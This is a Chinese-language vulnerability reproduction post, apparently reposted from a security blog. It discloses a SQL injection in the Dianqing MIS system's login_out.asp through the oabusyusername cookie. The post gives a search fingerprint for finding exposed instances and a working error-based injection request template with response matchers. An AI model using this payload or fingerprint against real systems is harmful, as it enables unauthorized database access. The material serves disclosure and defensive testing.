文章总结： 文档披露点晴MIS系统login_out.asp文件存在SQL注入漏洞，攻击者可通过篡改Cookie中oabusyusername参数执行恶意SQL查询。漏洞复现显示注入payload可触发数据库报错，影响使用该系统的所有版本。建议立即对用户输入参数实施严格过滤或采用预编译语句防御。 综合评分： 85 文章分类： 漏洞分析,WEB安全,渗透测试,应急响应,解决方案

[漏洞复现]点晴MIS管理信息系统login_out.asp存在SQL注入漏洞(VEID-2025-1205)

老谢 老谢

H4ll0 H4ck3r

2026年4月1日 09:03 广东

声明: 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，H4ll0 H4ck3r及文章作者不为此承担任何责任。H4ll0 H4ck3r拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经H4ll0 H4ck3r允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。

漏洞描述

该漏洞出现在点晴MIS系统的 login_out.asp 文件中。系统在处理用户注销或会话相关逻辑时，未对 Cookie 中的 oabusyusername 参数进行有效的过滤或 sanitization（清理），导致攻击者可以通过构造特殊的 Cookie 值来篡改后台SQL查询语句的结构

影响版本

点晴MIS管理信息系统

空间测绘

title="点晴MIS管理信息系统"

本地漏洞环境复现

Veil POC

GET /login_out.asp HTTP/1.1Host: {{Hostname}}Cookie: oabusyusername=1'+and+@@VERSION>1--User-Agent: {{random_ua}}
#@ condition: and#@ matcher: header["Content-Type"] contains "html" #@ matcher: body contains "转换成数据类型 int 时失败"#@ matcher: status_code == 500

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：H4ll0 H4ck3r 老谢 老谢《[漏洞复现]点晴MIS管理信息系统login_out.asp存在SQL注入漏洞(VEID-2025-1205)》